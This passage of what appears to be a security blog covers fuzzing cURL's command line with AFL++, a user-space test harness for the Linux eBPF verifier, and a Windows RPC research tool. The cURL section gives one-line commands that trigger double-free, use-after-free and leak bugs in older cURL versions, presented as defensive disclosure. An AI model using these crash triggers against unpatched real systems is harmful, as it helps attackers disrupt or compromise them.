A fuzzing dictionary file specifies the data elements that a fuzzing engine should focus on during testing. The fuzzing engine adjusts its mutation strategies so that it will process the tokens in the dictionary. In the case of cURL fuzzing, a fuzzing dictionary can help afl-fuzz more effectively generate valid test cases that contain options (which start with one or two dashes).

To fuzz cURL, I used the afl-clang-lto compiler’s autodictionary feature, which automatically generates a dictionary during compilation of the target binary. This dictionary is transferred to afl-fuzz on startup, improving its coverage. I also prepared a custom dictionary based on the cURL manpage and passed it to afl-fuzz via the -x parameter. I used the following Bash command to prepare the dictionary:

$ man curl | grep -oP '^\s*(--|-)\K\S+' | sed 's/[,.]$//' | sed 's/^/"&/; s/$/&"/'  | sort -u > curl.dict

Setting up a service for cURL connections

Initially, my focus was solely on CLI fuzzing. Still, I had to consider that each valid cURL command generated by the fuzzer would likely result in a connection to a remote service. To avoid connecting to those services but maintain the ability to test the code responsible for handling connections, I used the netcat tool as a simulation of remote service. First, I configured my machine to redirect outgoing traffic to netcat’s listening port.

I used the following command to run netcat in the background:

$ netcat -l 80 -k -w 0 &

The parameters indicate that the service should listen for incoming connections on port 80 (-l 80), continue to listen for additional connections after the current one is closed (-k), and immediately terminate the connection once it has been established (-w 0).

cURL is expected to connect to services using various hostnames, IP addresses, and ports. I needed to forward them to one place: a previously created TCP port 80.

To redirect all outgoing TCP packets to the local loopback address (127.0.0.1) on port 80, I used the following iptables rule:

$ iptables -t nat -A OUTPUT -p tcp -j REDIRECT --to-port 80

The command adds a new entry to the network address translation table in iptables. The -p option specifies the protocol (in this case, TCP), and the -j option specifies the rule’s target (in this case, REDIRECT). The --to-port option specifies the port to which the packets will be redirected (in this case, 80).

To ensure that all domain names would be resolved to IP address 127.0.0.1, I used the following iptables rule:

$ iptables -t nat -A OUTPUT -p udp --dport 53 -j DNAT --to-destination 127.0.0.1

This rule adds a new entry to the NAT table, specifying the protocol (-p) as UDP, the destination port (--dport) as 53 (the default port for DNS), and the target (-j) as destination NAT. The --to-destination option specifies the address to which the packets will be redirected (in this case, 127.0.0.1).

The abovementioned setup ensures that every cURL connection is directed to the address 127.0.0.1:80.

Results analysis

The fuzzing process ran for a month on a 32-core machine with an Intel Xeon Platinum 8280 CPU @ 2.70GHz. The following bugs were identified during that time, most of them in the first few hours of fuzzing:

CVE-2022-42915 (Double free when using HTTP proxy with specific protocols)

Using cURL with proxy connection and dict, gopher, LDAP, or telnet protocol triggers a double-free vulnerability due to flaws in the error/cleanup handling. This issue is fixed in cURL 7.86.0.

To reproduce the bug, use the following command:

$ curl -x 0:80 dict://0

CVE-2022-43552 (Use after free when HTTP proxy denies tunneling SMB/TELNET protocols)

cURL can virtually tunnel supported protocols through an HTTP proxy. If an HTTP proxy blocks SMB or TELNET protocols, cURL may use a struct that has already been freed in its transfer shutdown code. This issue is fixed in cURL 7.87.0.

To reproduce the bug, use the following commands:

$ curl 0 -x0:80 telnet:/[j-u][j-u]//0 -m 01
$ curl 0 -x0:80 smb:/[j-u][j-u]//0 -m 01

TOB-CURL-10 (Use after free while using parallel option and sequences)

A use-after-free vulnerability can be triggered by using cURL with the parallel option (-Z), an unmatched bracket, and two consecutive sequences that create 51 hosts. cURL allocates memory blocks for error buffers, allowing up to 50 transfers by default. In the function responsible for handling errors, errors are copied to the appropriate error buffer when connections fail, and the memory is then freed. For the last (51) sequence, a memory buffer is allocated, freed, and an error is copied to the previously freed memory buffer. This issue is fixed in cURL 7.86.0.

To reproduce the bug, use the following command:

$ curl 0 -Z [q-u][u-~] }

TOB-CURL-11 (Unused memory blocks are not freed, resulting in memory leaks)

cURL allocates blocks of memory that are not freed when they are no longer needed, leading to memory leaks. This issue is fixed in cURL 7.87.0.

To reproduce the bug, use the following commands:

$ curl 0 -Z 0 -Tz 0
$ curl 00 --cu 00
$ curl --proto =0 --proto =0

Dockerfile

If you want to learn about the full process of setting up a fuzzing harness and immediately begin fuzzing cURL’s CLI arguments, we have prepared a Dockerfile for you:

# syntax=docker/dockerfile:1
FROM aflplusplus/aflplusplus:4.05c

RUN apt-get update && apt-get install -y libssl-dev netcat iptables groff

# Clone a curl repository
RUN git clone https://github.com/curl/curl.git && cd curl && git checkout 2ca0530a4d4bd1e1ccb9c876e954d8dc9a87da4a

# Apply a patch to use afl++ argv fuzzing feature
COPY <<-EOT /AFLplusplus/curl/curl_argv_fuzz.patch
		diff --git a/src/tool_main.c b/src/tool_main.c
		--- a/src/tool_main.c
		+++ b/src/tool_main.c
		@@ -54,6 +54,7 @@
		 #include "tool_vms.h"
		 #include "tool_main.h"
		 #include "tool_libinfo.h"
		+#include "../../AFLplusplus/utils/argv_fuzzing/argv-fuzz-inl.h"

		 /*
		  * This is low-level hard-hacking memory leak tracking and similar. Using
		@@ -246,6 +247,8 @@ int main(int argc, char *argv[])
		   struct GlobalConfig global;
		   memset(&global, 0, sizeof(global));

		+  AFL_INIT_ARGV();
		+
		 #ifdef WIN32
		   /* Undocumented diagnostic option to list the full paths of all loaded
		      modules. This is purposely pre-init. */
EOT

# Apply a patch to use afl++ argv fuzzing feature
RUN cd curl && git apply curl_argv_fuzz.patch

# Compile a curl using collision-free instrumentation at link time and ASAN
RUN cd curl && \
	autoreconf -i && \
	CC="afl-clang-lto" CFLAGS="-fsanitize=address -g" ./configure --with-openssl --disable-shared && \
	make -j $(nproc) && \
	make install

# Download a dictionary
RUN wget 
https://gist.githubusercontent.com/ahpaleus/f94eca6b29ca8824cf6e5a160379612b/raw/3de91b2dfc5ddd8b4b2357b0eb7fbcdc257384c4/curl.dict

COPY <<-EOT script.sh
	#!/bin/bash
	# Running a netcat listener on port tcp port 80 in the background
	netcat -l 80 -k -w 0 &

	# Prepare iptables entries
	iptables-legacy -t nat -A OUTPUT -p tcp -j REDIRECT --to-port 80
	iptables-legacy -t nat -A OUTPUT -p udp --dport 53 -j DNAT --to-destination 127.0.0.1

	# Prepare fuzzing directories
	mkdir fuzz &&
		  cd fuzz &&
		  mkdir in out &&
		  echo -ne 'curl\x00http://127.0.0.1:80' > in/example_command.txt &&
		  # Run afl++ fuzzer
		  afl-fuzz -x /AFLplusplus/curl.dict -i in/ -o out/ -- curl
EOT

RUN chmod +x ./script.sh
ENTRYPOINT ["./script.sh"]

Use the following commands to run this file:

$ docker buildx build -t curl_fuzz .
$ docker run --rm -it --cap-add=NET_ADMIN curl_fuzz

All joking aside

In summary, our approach demonstrates that fuzzing CLI can be an effective supplementary technique for identifying vulnerabilities in software. Despite initial skepticism, our results yielded valuable insights. We believe this has improved the security of CLI-based tools, even when OSS-Fuzz has been used for many years.

It is possible to find a heap-based memory corruption vulnerability in the cURL cleanup process. However, use-after-free vulnerability may not be exploitable unless the freed data is used in the appropriate way and the data content is controlled. A double-free vulnerability would require further allocations of similar size and control over the stored data. Additionally, because the vulnerability is in libcurl, it can impact many different software applications that use libcurl in various ways, such as sending multiple requests or setting and cleaning up library resources within a single process.

It is also worth noting that although the attack surface for CLI exploitation is relatively limited, if an affected tool is a SUID binary, exploitation can result in privilege escalation (see CVE-2021-3156: Heap-Based Buffer Overflow in sudo).

To enhance the efficiency of fuzz testing similar tools in the future, we have extended the argv_fuzz feature in AFL++ by incorporating a persistent fuzzing mode. Learn more about it here.

Finally, our cURL audit reports are public. Check the audit report and the threat model.

Harnessing the eBPF Verifier

By Laura Bauman

During my internship at Trail of Bits, I prototyped a harness that improves the testability of the eBPF verifier, simplifying the testing of eBPF programs. My eBPF harness runs in user space, independently of any locally running kernel, and thus opens the door to testing of eBPF programs across different kernel versions.

eBPF enables users to instrument a running system by loading small programs into the operating system kernel. As a safety measure, the kernel “verifies” eBPF programs at load time and rejects any that it deems unsafe. However, using eBPF is a CI / CD nightmare, because there’s no way to know whether a given eBPF program will successfully load and pass verification without testing it on a running kernel.

My harness aims to eliminate that nightmare by executing the eBPF verifier outside of the running kernel. To use the harness, a developer tweaks my libbpf-based sample programs (hello.bpf.c and hello_loader.c) to tailor them to the eBPF program being tested. The version of libbpf provided by my harness links against a “kernel library” that implements the actual bpf syscall, which provides isolation from the running kernel. The harness works well with kernel version 5.18, but it is still a proof of concept; enabling support for other kernel versions and additional eBPF program features will require a significant amount of work.

With great power comes great responsibility

eBPF is an increasingly powerful technology that is used to increase system observability, implement security policies, and perform advanced networking operations. For example, the osquery open-source endpoint agent uses eBPF for security monitoring, to enable organizations to watch process and file events happening across their fleets.

The ability to inject eBPF code into the running kernel seems like either a revelation or a huge risk to the kernel’s security, integrity, and dependability. But how on earth is it safe to load user-provided code into the kernel and execute it there? The answer to this question is twofold. First, eBPF isn’t “normal” code, and it doesn’t execute in the same way as normal code. Second, eBPF code is algorithmically “verified” to be safe to execute.

eBPF isn’t normal code

eBPF (extended Berkeley Packet Filter) is an overloaded term that refers to both a specialized bytecode representation of programs and the in-kernel VM that runs those bytecode programs. eBPF is an extension of classic BPF, which has fewer features than eBPF (e.g., two registers instead of ten), uses an in-kernel interpreter instead of a just-in-time compiler, and focuses only on network packet filtering.

User applications can load eBPF code into kernel space and run it there without modifying the kernel’s source code or loading kernel modules. Loaded eBPF code is checked by the kernel’s eBPF verifier, which tries to prove that the code will terminate without crashing.

The picture above shows the general interaction between user space and kernel space, which occurs through the bpf syscall. The eBPF program is represented in eBPF bytecode, which can be obtained through the Clang back end. The interaction begins when a user space process executes the first in the series of bpf syscalls used to load an eBPF program into the kernel. The kernel then runs the verifier, which enforces constraints that ensure the eBPF program is valid (more on that later). If the verifier approves the program, the verifier will finalize the process of loading it into the kernel, and it will run when it is triggered. The program will then serve as a socket filter, listening on a socket and forwarding only information that passes the filter to user space.

Verifying eBPF

The key to eBPF safety is the eBPF verifier, which limits the set of valid eBPF programs to those that it can guarantee will not harm the kernel or cause other issues. This means that eBPF is, by design, not Turing-complete.

Over time, the set of eBPF programs accepted by the verifier has expanded, though the testability of that set of programs has not. The following quote from the “BPF Design Q&A” section of the Linux kernel documentation is telling:

The [eBPF] verifier is steadily getting ‘smarter.’ The limits are being removed. The only way to know that the program is going to be accepted by the verifier is to try to load it. The BPF development process guarantees that the future kernel versions will accept all BPF programs that were accepted by the earlier versions.

This “development process” relies on a limited set of regression tests that can be run through the kselftest system. These tests require that the version of the source match that of the running kernel and are aimed at kernel developers; the barrier to entry for others seeking to run or modify such tests is high. As eBPF is increasingly relied upon for critical observability and security infrastructure, it is concerning that the Linux kernel eBPF verifier is a single point of failure that is fundamentally difficult to test.

Trust but verify

The main problem facing eBPF is portability—that is, it is notoriously difficult to write an eBPF program that will pass the verifier and work correctly on all kernel versions (or, heck, on even one). The introduction of BPF Compile Once-Run Everywhere (CO-RE) has significantly improved eBPF program portability, though issues still remain. BPF CO-RE relies on the eBPF loader library (libbpf), the Clang compiler, and the eBPF Type Format (BTF) information in the kernel. In short, BPF CO-RE means that an eBPF program can be compiled on one Linux kernel version (e.g., by Clang), modified to match the configuration of another kernel version, and loaded into a kernel of that version (through libbpf) as though the eBPF bytecode had been compiled for it.

However, different kernel versions have different verifier limits and support different eBPF opcodes. This makes it difficult (from an engineering perspective) to tell whether a particular eBPF program will run on a kernel version other than the one it has been tested on. Moreover, different configurations of the same kernel version will also have different verifier behavior, so determining a program’s portability requires testing the program on all desired configurations. This is not practical when building CI infrastructure or trying to ship a production piece of software.

Projects that use eBPF take a variety of approaches to overcoming its portability challenges. For projects that primarily focus on tracing syscalls (like osquery and opensnoop), BPF CO-RE is less necessary, since syscall arguments are stable between kernel versions. In those cases, the limiting factor is the variations in verifier behavior. Osquery chooses to place strict constraints on its eBPF programs; it does not take advantage of modern eBPF verifier support for structures such as bounded loops and instead continues to write eBPF programs that would be accepted by the earliest verifiers. Other projects, such as SysmonForLinux, maintain multiple versions of eBPF programs for different kernel versions and choose a program version dynamically, during compilation.

What is the eBPF verifier?

One of the key benefits of eBPF is the guarantee it provides: that the loaded code will not crash the kernel, will terminate within a time limit, and will not leak information to unprivileged user processes. To ensure that code can be injected into the kernel safely and effectively, the Linux kernel’s eBPF verifier places restrictions on the abilities of eBPF programs. The name of the verifier is slightly misleading, because although it aims to enforce restrictions, it does not perform formal verification.

The verifier performs two main passes over the code. The first pass is handled by the check_cfg() function, which ensures that the program is guaranteed to terminate by performing an iterative depth-first search of all possible execution paths. The second pass (done in the do_check() function) involves static analysis of the bytecode; this pass ensures that all memory accesses are valid, that types are used consistently (e.g., scalar values are never used as pointers), and that the number of branches and total instructions is within certain complexity limits.

As mentioned earlier in the post, the constraints that the verifier enforces have changed over time. For example, eBPF programs were limited to a maximum of 4,096 instructions until kernel version 5.2, which increased that number to 1 million. Kernel version 5.3 introduced the ability for eBPF programs to use bounded loops. Note, though, that the verifier will always be backward compatible in that all future versions of the verifier will accept any eBPF program accepted by older versions of the verifier.

Alarmingly, the ability to load eBPF programs into the kernel is not always restricted to root users or processes with the CAP_SYS_ADMIN capability. In fact, the initial plan for eBPF included support for unprivileged users, requiring the verifier to disallow the sharing of kernel pointers with user programs and to perform constant blinding. In the wake of several privilege escalation vulnerabilities affecting eBPF, most Linux distributions have disabled support for unprivileged users by default. However, overriding the default still creates a risk of crippling privilege escalation attacks.

Regardless of whether eBPF is restricted to privileged users, flaws in the verifier cannot be tolerated if eBPF is to be relied upon for security-critical functionality. As explained in an LWN.net article, at the end of the day, “[the verifier] is 2000 lines or so of moderately complex code that has been reviewed by a relatively small number of (highly capable) people. It is, in a real sense, an implementation of a blacklist of prohibited behaviors; for it to work as advertised, all possible attacks must have been thought of and effectively blocked. That is a relatively high bar.” While the code may have been reviewed by highly capable people, the verifier is still a complex bit of code embedded in the Linux kernel that lacks a cohesive testing framework. Without thorough testing, there is a risk that the backward compatibility principle could be violated or that entire classes of potentially insecure programs could be allowed through the verifier.

Enabling rigorous testing of the eBPF verifier

Given that the eBPF verifier is the foundation of critical infrastructure, it should be analyzed through a rigorous testing process that can be easily integrated into CI workflows. Kernel selftests and example eBPF programs that require a running Linux kernel for every kernel version are inadequate.

The eBPF verifier harness aims to allow testing on various kernel versions without any dependence on the locally running kernel version or configuration. In other words, the harness allows the verifier (the verifier.c file) to run in user space.

Compiling only a portion of the kernel source code for execution in user space is difficult because of the monolithic nature of the kernel and the kernel-specific idioms and functionality. Luckily, the task of eBPF verification is limited in scope, and many of the involved functions and files are consistent across kernel versions. Thus, stubbing out kernel-specific functions for user space alternatives makes it possible to run the verifier in isolation. For instance, because the verifier expects to be called from within a running kernel, it calls kernel-specific memory allocation functions when it is allocating memory. When it is run within the harness, it calls user space memory allocation functions instead.

The harness is not the first tool that aims to improve the verifier’s testability. The IO Visor Project’s BPF fuzzer has a very similar goal of running the verifier in user space and enabling efficient fuzzing—and the tool has found at least one bug. But there is one main difference between the eBPF harness and similar existing solutions: the harness is intended to support all kernel versions, making it easy to compare the same eBPF program across kernel versions. The harness leaves the true kernel functionality as intact as possible to maintain an execution environment that closely approximates a true kernel context.

System design

The harness consists of the following main components:

  • Linux source code (in the form of a Git submodule)
  • A LibBPF mirror (also a Git submodule)
  • header_stubs.h (which enables certain kernel functions and macros to be overridden or excluded altogether)
  • Harness source code (i.e., implementations of stubbed-out kernel functions)

The architecture of the eBPF verifier harness.

At a high level, the harness runs a sample eBPF program through the verifier by using standard libbpf conventions in sample.bpf.c and calling bpf_object__load() in sample_loader.c. The libbpf code runs as normal (e.g., probing the “kernel” to see what operations are supported, autocreating maps if configured to do so, etc.), but instead of invoking the actual bpf() syscall and trapping to the running kernel, it executes a harness “syscall” and continues running within the harnessed kernel.

Compiling a portion of the Linux kernel involves making a lot of decisions on which source files should be included and which should be stubbed out. For example, the kernel frequently calls the kmalloc() and kfree() functions for dynamic memory allocation. Because the verifier is running in user space, these functions can be replaced with user space versions like malloc() and free(). Kernel code also includes a lot of synchronization primitives that are not necessary in the harness, since the harness is a single-threaded application; those primitives can also safely be stubbed out.

Other kernel functionality is more difficult to efficiently replace. For example, getting the harness to work required finding a way to simulate the Linux kernel Virtual File System. This was necessary because the verifier is responsible for ensuring the safe use of eBPF maps, which are identified by file descriptors. To simulate operations on file descriptors, the harness must also be able to simulate the creation of files associated with the descriptors.

A demonstration

So how does the harness actually work? What do the sample programs look like? Below is a simple eBPF program that contains a bounded loop; verifier support for bounded loops was introduced in kernel version 5.3, so all kernel versions older than 5.3 should reject the program, and all versions newer than 5.3 should accept it. Let’s run it through the harness and see what happens!

bounded_loop.bpf.c:

#include "vmlinux.h"
#include <BPF/BPF_helpers.h>


SEC("tracepoint/syscalls/sys_enter_execve")
int handle_tp(void *ctx)
{
    for (int i = 0; i < 3; i++) {
        BPF_printk("Hello World.\n");
    }
    return 0;
}

char LICENSE[] SEC("license") = "Dual BSD/GPL";

Using the harness requires compiling each eBPF program into eBPF bytecode; once that’s done, a “loader” program calls the libbpf functions that handle the setup of the bpf syscalls. The loader program looks something like the program shown below, but it can be tweaked to allow for different configuration and setup options (e.g., to disable the autocreation of maps).

bounded_loop_loader.c:

#include 
#include 
#include "bounded_loop.skel.h"

static int libbpf_print_fn(enum libbpf_print_level level, const char *format, va_list args) {
    return vfprintf(stderr, format, args);
}

int load() {
  struct bounded_loop_bpf *obj;
  const struct bpf_insn *insns;
  int err = 0;

  libbpf_set_print(libbpf_print_fn);

  obj = bounded_loop_bpf__open();
  if (!obj) {
    fprintf(stderr, "failed to open BPF object. \n");
    return 1;
  }

  // this function invokes the verifier
  err = bpf_object__load(*obj->skeleton->obj);

  // free memory allocated by libbpf functions
  bounded_loop_bpf__destroy(obj);
  return err;
}

Compiling the sample program with the necessary portions of Linux source code, libbpf, and the harness runtime produces an executable that will run the verifier and report whether the program passes verification.

The output of bounded_loop.bpf.c when run through version 5.18 of the verifier.

Looking forward

The harness is still a proof of concept, and several aspects of it will need to be improved before it can be used in production. For instance, to fully support all eBPF map types, the harness will need the ability to fully stub out additional kernel-level memory allocation primitives. The harness will also need to reliably support all versions of the verifier between 3.15 and the latest version. Implementing that support will involve manually accounting for differences in the internal kernel application programming interfaces (APIs) between these versions and adjusting stubbed-out subsystems as necessary. Lastly, more cohesive organization of the stubbed-out functions, as well as thorough documentation on their organization, would make it much easier to distinguish between unmodified kernel code and functions that have been stubbed out with user space alternatives.

Because these issues will take a nontrivial amount of work, we invite the larger community to build upon the work we have released. While we have many ideas for improvements that will move the eBPF verifier closer to adoption, we believe there are others out there that could enhance this work with their own expertise. Although that initial work will enable rapid testing of all kernel versions once it’s complete, the harness will still need to be updated each time a kernel version is released to account for any internal changes.

However, the eBPF verifier is critical and complex infrastructure, and complexity is the enemy of security; when it is difficult to test complex code, it is difficult to feel confident in the security of that code. Thus, extracting the verifier into a testing harness is well worth the effort—though the amount of effort it requires should serve as a general reminder of the importance of testability.

Introducing RPC Investigator

A new tool for Windows RPC research

By Aaron LeMasters

Trail of Bits is releasing a new tool for exploring RPC clients and servers on Windows. RPC Investigator is a .NET application that builds on the NtApiDotNet platform for enumerating, decompiling/parsing and communicating with arbitrary RPC servers. We’ve added visualization and additional features that offer a new way to explore RPC.

RPC is an important communication mechanism in Windows, not only because of the flexibility and convenience it provides software developers but also because of the renowned attack surface its implementers afford to exploit developers. While there has been extensive research published related to RPC servers, interfaces, and protocols, we feel there’s always room for additional tooling to make it easier for security practitioners to explore and understand this prolific communication technology.

Below, we’ll cover some of the background research in this space, describe the features of RPC Investigator in more detail, and discuss future tool development.

If you prefer to go straight to the code, check out RPC Investigator on Github.

Background

Microsoft Remote Procedure Call (MSRPC) is a prevalent communication mechanism that provides an extensible framework for defining server/client interfaces. MSRPC is involved on some level in nearly every activity that you can take on a Windows system, from logging in to your laptop to opening a file. For this reason alone, it has been a popular research target in both the defensive and offensive infosec communities for decades.

A few years ago, the developer of the open source .NET library NtApiDotNet, James Foreshaw, updated his library with functionality for decompiling, constructing clients for, and interacting with arbitrary RPC servers. In an excellent blog post—focusing on using the new NtApiDotNet functionality via powershell scripts and cmdlets in his NtObjectManager package—he included a small section on how to use the powershell scripts to generate C# code for an RPC client that would work with a given RPC server and then compile that code into a C# application.

We built on this concept in developing RPC Investigator (RPCI), a .NET/C# Windows Forms UI application that provides a visual interface into the existing core RPC capabilities of the NtApiDotNet platform:

  • Enumerating all active ALPC RPC servers
  • Parsing RPC servers from any PE file
  • Parsing RPC servers from processes and their loaded modules, including services
  • Integration of symbol servers
  • Exporting server definitions as serialized .NET objects for your own scripting

Beyond visualizing these core features, RPCI provides additional capabilities:

  • The Client Workbench allows you to create and execute an RPC client binary on the fly by right-clicking on an RPC server of interest. The workbench has a C# code editor pane that allows you to edit the client in real time and observe results from RPC procedures executed in your code.
  • Discovered RPC servers are organized into a library with a customizable search interface, allowing you to pivot RPC server data in useful ways, such as by searching through all RPC procedures for all servers for interesting routines.
  • The RPC Sniffer tool adds visibility into RPC-related Event Tracing for Windows (ETW) data to provide a near real-time view of active RPC calls. By combining ETW data with RPC server data from NtApiDotNet, we can build a more complete picture of ongoing RPC activity.

Features

Disclaimer: Please exercise caution whenever interacting with system services. It is possible to corrupt the system state or cause a system crash if RPCI is not used correctly.

Prerequisites and System Requirements

Currently, RPCI requires the following:

By default, RPCI will automatically discover the Debugging Tools for Windows installation directory and configure itself to use the public Windows symbol server. You can modify these settings by clicking Edit -> Settings. In the Settings dialog, you can specify the path to the debugging tools DLL (dbghelp.dll) and customize the symbol server and local symbol directory if needed (for example, you can specify the path srv*c:\symbols*https://msdl.microsoft.com/download/symbols).

If you want to observe the debug output that is written to the RPCI log, set the appropriate trace level in the Settings window. The RPCI log and all other related files are written to the current user’s application data folder, which is typically C:\Users\(user)\AppData\Roaming\RpcInvestigator. To view this folder, simply navigate to View -> Logs. However, we recommend disabling tracing to improve performance.

It’s important to note that the bitness of RPCI must match that of the system: if you run 32-bit RPCI on a 64-bit system, only RPC servers hosted in 32-bit processes or binaries will be accessible (which is most likely none).

Searching for RPC servers

The first thing you’ll want to do is find the RPC servers that are running on your system. The most straightforward way to do this is to query the RPC endpoint mapper, a persistent service provided by the operating system. Because most local RPC servers are actually ALPC servers, this query is exposed via the File -> All RPC ALPC Servers… menu item.

The discovered servers are listed in a table view according to the hosting process, as shown in the screenshot above. This table view is one starting point for navigating RPC servers in RPCI. Double-clicking a particular server will open another tab that lists all endpoints and their corresponding interface IDs. Double-clicking an endpoint will open another tab that lists all procedures that can be invoked on that endpoint’s interface. Right-clicking on an endpoint will open a context menu that presents other useful shortcuts, one of which is to create a new client to connect to this endpoint’s interface. We’ll describe that feature in a later section.

You can locate other RPC servers that are not running (or are not ALPC) by parsing the server’s image by selecting File -> Load from binary… and locating the image on disk, or by selecting File->Load from service… and selecting the service of interest (this will parse all servers in all modules loaded in the service process).

Exploring the Library

The other starting point for navigating RPC servers is to load the library view. The library is a file containing serialized .NET objects for every RPC server you have discovered while using RPCI. Simply select the menu item Library -> Servers to view all discovered RPC servers and Library -> Procedures to view all discovered procedures for all server interfaces. Both menu items will open in new tabs. To perform a quick keyword search in either tab, simply right-click on any row and type a search term into the textbox. The screenshot below shows a keyword search for “()” to quickly view procedures that have zero arguments, which are useful starting points for experimenting with an interface.

The first time you run RPCI, the library needs to be seeded. To do this, navigate to Library -> Refresh, and RPCI will attempt to parse RPC servers from all modules loaded in all processes that have a registered ALPC server. Note that this process could take quite a while and use several hundred megabytes of memory; this is because there are thousands of such modules, and during this process the binaries are re-mapped into memory and the public Microsoft symbol server is consulted. To make matters worse, the Dbghelp API is single-threaded and I suspect Microsoft’s public symbol server has rate-limiting logic.

You can periodically refresh the database to capture any new servers. The refresh operation will only add newly-discovered servers. If you need to rebuild the library from scratch (for example, because your symbols were wrong), you can either erase it using the menu item Library -> Erase or manually delete the database file (rpcserver.db) inside the current user’s roaming application data folder. Note that RPC servers that are discovered by using the File -> Load from binary… and File -> Load from service… menu items are automatically added to the library.

You can also export the entire library as text by selecting Library -> Export as Text.

Creating a New RPC Client

One of the most powerful features of RPCI is the ability to dynamically interact with an RPC server of interest that is actively running. This is accomplished by creating a new client in the Client Workbench window. To open the Client Workbench window, right-click on the server of interest from the library servers or procedures tab and select New Client.

The workbench window is organized into three panes:

  • Static RPC server information
  • A textbox containing dynamic client output
  • A tab control containing client code and procedures tabs

The client code tab contains C# source code for the RPC client that was generated by NtApiDotNet. The code has been modified to include a “Run” function, which is the “entry point” for the client. The procedures tab is a shortcut reference to the routines that are available in the selected RPC server interface, as the source code can be cumbersome to browse (something we are working to improve!).

The process for generating and running the client is simple:

  • Modify the “Run” function to call one or more of the procedures exposed on the RPC server interface; you can print the result if needed.
  • Click the “Run” button.
  • Observe any output produced by “Run”

In the screenshot above, I picked the “Host Network Service” RPC server because it exposes some procedures whose names imply interesting administrator capabilities. With a few function calls to the RPC endpoint, I was able to interact with the service to dump the name of what appears to be a default virtual network related to Azure container isolation.

Sniffing RPC Traffic with ETW Data

Another useful feature of RPCI is that it provides visibility into RPC-related ETW data. ETW is a diagnostic capability built into the operating system. Many years ago ETW was very rudimentary, but since the Endpoint Detection and Response (EDR) market exploded in the last decade, Microsoft has evolved ETW into an extremely rich source of information about what’s going on in the system. The gist of how ETW works is that an ETW provider (typically a service or an operating system component) emits well-structured data in “event” packets and an application can consume those events to diagnose performance issues.

RPCI registers as a consumer of such events from the Microsoft-RPC (MSRPC) ETW provider and displays those events in real time in either table or graph format. To start the RPC Sniffer tool, navigate to Tools -> RPC Sniffer… and click the “play” button in the toolbar. Both the table and graph will be updated every few seconds as events begin to arrive.

The events emitted by the MSRPC provider are fairly simple. The events record the results of RPC calls between a client and server in RpcClientCall and RpcServerCall start and stop task pairs. The start events contain detailed information about the RPC server interface, such as the protocol, procedure number, options, and authentication used in the call. The stop events are typically less interesting but do include a status code. By correlating the call start/stop events between a particular RPC server and the requesting process, we can begin to make sense of the operations that are in progress on the system. In the table view, it’s easier to see these event pairs when the ETW data is grouped by ActivityId (click the “Group” button in the toolbar), as shown below.

The data can be overwhelming, because ETW is fairly noisy by design, but the graph view can help you wade through the noise. To use the graph view, simply click the “Node” button in the toolbar at any time during the trace. To switch back to the table view, click the “Node” button again.

A long-running trace will produce a busy graph like the one above. You can pan, zoom, and change the graph layout type to help drill into interesting server activity. We are exploring additional ways to improve this visualization!

In the zoomed-in screenshot above, we can see individual service processes that are interacting with system services such as Base Filtering Engine (BFE, the Windows Defender firewall service), NSI, and LSASS.

Here are some other helpful tips to keep in mind when using the RPC Sniffer tool:

  • Keep RPCI diagnostic tracing disabled in Settings.
  • Do not enable ETW debug events; these produce a lot of noise and can exhaust process memory after a few minutes.
  • For optimum performance, use a release build of RPCI.
  • Consider docking the main window adjacent to the sniffer window so that you can navigate between ETW data and library data (right-click on a table row and select Open in library or click on any RPC node while in the graph view).
  • Remember that the graph view will refresh every few seconds, which might cause you to lose your place if you are zooming and panning. The best use of the graph view is to take a capture for a fixed time window and explore the graph after the capture has been stopped.

What’s Next?

We plan to accomplish the following as we continue developing RPCI:

  • Improve the code editor in the Client Workbench
  • Improve the autogeneration of names so that they are more intuitive
  • Introduce more developer-friendly coding features
  • Improve the coverage of RPC/ALPC servers that are not registered with the endpoint mapper
  • Introduce an automated ALPC port connector/scanner
  • Improve the search experience
  • Extend the graph view to be more interactive

Related Research and Further Reading

Because MSRPC has been a popular research topic for well over a decade, there are too many related resources and research efforts to name here. We’ve listed a few below that we encountered while building this tool:

If you would like to see the source code for other related RPC tools, we’ve listed a few below:

If you’re unfamiliar with RPC internals or need a technical refresher, we recommend checking out one of the authoritative sources on the topic, Alex Ionescu’s 2014 SyScan talk in Singapore, “All about the RPC, LRPC, ALPC, and LPC in your PC.”